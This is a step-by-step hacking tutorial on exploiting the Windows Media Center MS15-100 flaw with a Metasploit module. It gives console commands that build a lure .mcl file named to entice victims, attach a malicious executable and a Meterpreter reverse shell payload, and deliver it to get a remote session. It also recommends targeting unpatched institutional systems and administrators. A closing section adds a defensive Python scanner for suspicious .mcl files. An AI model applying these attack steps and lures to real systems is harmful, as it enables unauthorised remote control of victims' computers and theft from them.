Recently, Microsoft released a new patch (September 8, 2015) to close another vulnerability in their Windows Vista, 7, 8, and 8.1 operating systems. The vulnerability in question (MS15-100) enabled an attacker to gain remote access to any of these systems using a well-crafted Media Center link (MCL) file.
As hackers, we need to take a multipronged approach to gaining access to a system. Gone are the days of MS08-067 that would basically allow you to remotely take control of any Windows XP, 2003, or 2008 system. Now we have to be more crafty to find a way to gain access to the system. The Adobe Flash exploits have been, and continue to be, excellent gateways into Windows systems, if we can get the user to click on a URL link. Many applications have vulnerabilities, but before attacking those we need to know that they are on the system. That’s why reconnaissance is so critical.
This hack is targeted at the Media Center on every Windows Vista, 7, 8, and 8.1 system. That makes it ubiquitous, but we still need to send the victim an .mcl link to gain access to their system. Metasploit recently added an exploit to accomplish this task, and that is what we will be using here (another exploit that accomplishes the same thing without the Metasploit framework does exist in the Exploit Database).
Microsoft Security Bulletin MS15-100 – Important
Here is what Microsoft said about this vulnerability (MS15-100) in their Microsoft Security Bulletin on TechNet:
Although the vulnerability has been patched, many systems don’t have automatic patching for a number of reasons, especially within corporate, large institution, and military installations. Just a warning: this hack is not for the newbie. It requires significant knowledge of both Linux and Metasploit to work.
Step 1: Fire Up Kali
Our first step, of course, is to fire up Kali. This exploit requires that you have Ruby 2.1 on your Kali system, so if you are using Kali 1.1 or earlier, you will need to upgrade your Ruby. Kali 2.0 has the upgraded Ruby, so there’s no need to upgrade.
Step 2: Go to Exploit-DB
Next, let’s go to the Exploit-DB. Under the Remote Code Execution Exploits section, we can find the exploit under its Microsoft designation, MS15-100.
When we select this exploit, it brings up the Metasploit code that we must add to our Metasploit framework. Copy and paste it to a text file in Kali.
Step 3: Add New Module to Metasploit
Earlier this year, I wrote a tutorial on how to install a new module in Metasploit, so please refer to that if you need more help on this subject. You will need to add this module to your Metasploit framework before we can proceed. Name it ms15_100_mcl.rb. It may be that by the time you read this article, Rapid7 will have added this module to the framework and you won’t need to add the module, but time is critical here.
Step 4: Start Metasploit & Search for New Module
Once you have added the module to Metasploit, start (or restart) Metasploit and search for the module to make certain it is available to you.
msf > search ms15_100
If you find it, we are ready to roll!
Step 5: Load New Module
We now need to load the module:
msf > use exploit/windows/fileformat/ms15_100_mcl
This loads this exploit into memory.
Step 6: Info
Now that we have loaded the module, let’s type info to see what requirements this module needs.
msf > info
As you can see, we need to provide this module with both the FILENAME and the FILE_NAME. One is the .mcl file (FILENAME) and the other is the malicious file (FILE_NAME) we will load onto the victim’s system.
Step 7: Set Options
As you can see in the screenshot above, this module will require that we set the name of the .mcl file (FILENAME) and the name of the malicious payload (FILE_NAME). In an attempt to entice the victim to open my .mcl link, I’ll call it best_music_video_ever.mcl.
msf > set FILENAME best_music_video_ever.mcl
msf > set FILE_NAME best_video.exe
We also need to set a payload. In this case, I will use the Windows Meterpreter.
msf > set PAYLOAD windows/meterpreter/reverse_tcp
Finally, we just type exploit.
msf > exploit
That is the file we need to get to the victim!
Step 8: Send the MCL File to the Victim
Metasploit has now created our .mcl file and opened a share on the network. We now need to send this file, one way or another, to the victim and get them to open it.
Note in the screenshot above that the victim’s Windows 7 system has the MCL file, best_music_video_ever.mcl, on their desktop.
Step 9: Take Control of the System
When the victim clicks on the .mcl link to watch the “Best Music Video Ever,” it will connect back to our Kali system, opening a Meterpreter session. In my case, the session did not automatically open in Metasploit, but when I typed:
msf > sessions -l
I received this response showing me that a session had been opened on the victim machine. Success!
Now that I have a Meterpreter session, I can do just about anything on this system within the privileges I came in on. Since this exploit comes in with the privileges of the user, I will be limited to the privileges of the user who clicked on the .mcl file. Obviously, if we can get an administrator to click on this file, we will come in with their privileges, which would be much more powerful.
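Seen from the defender's side, what Steps 7 and 8 leave behind is an .mcl file that points at a network share or an executable. The following is an added example, not part of the original tutorial or of Metasploit: it scans a directory such as a mail quarantine or a user profile for such files. It assumes .mcl files are small XML text files and inspects only quoted attribute values; the sample content, its attribute names and the address are constructed.

```python
import re
from pathlib import Path

# Assumption: an .mcl file is a small XML text file, so every value of interest
# sits in a quoted attribute. Attribute names are deliberately ignored.
ATTR_VALUE = re.compile(r"""=\s*(["'])(.*?)\1""", re.S)
RISKY_EXT = (".exe", ".scr", ".bat", ".cmd", ".pif")

def decode(raw):
    """Decode file bytes; a UTF-16 BOM is honoured, anything else is read as UTF-8."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8-sig", errors="replace")

def classify_mcl(raw):
    """Return the reasons a file's content is suspicious (empty list = none)."""
    reasons = []
    for _quote, value in ATTR_VALUE.findall(decode(raw)):
        value = value.strip()
        lowered = value.lower()
        if value.startswith("\\\\") or lowered.startswith("file://"):
            reasons.append("references a network share: " + value)
        elif lowered.endswith(RISKY_EXT):
            reasons.append("references an executable: " + value)
    return reasons

def scan_tree(root):
    """Walk a directory and return {path: reasons} for suspicious .mcl files."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() == ".mcl":
            reasons = classify_mcl(path.read_bytes())
            if reasons:
                hits[str(path)] = reasons
    return hits

# Constructed samples; attribute names are placeholders, only values are inspected.
SAMPLE_SHARE = b'<application path="\\\\192.0.2.10\\share\\best_video.exe" />'
SAMPLE_BENIGN = b'<application link="http://example.com/guide" title="TV Guide" />'

if __name__ == "__main__":
    print(classify_mcl(SAMPLE_SHARE))
    print(classify_mcl(SAMPLE_BENIGN))
```

Because legitimate use of .mcl files is rare, many mail and web gateways can simply block the extension; the scan is useful for triaging what has already been delivered.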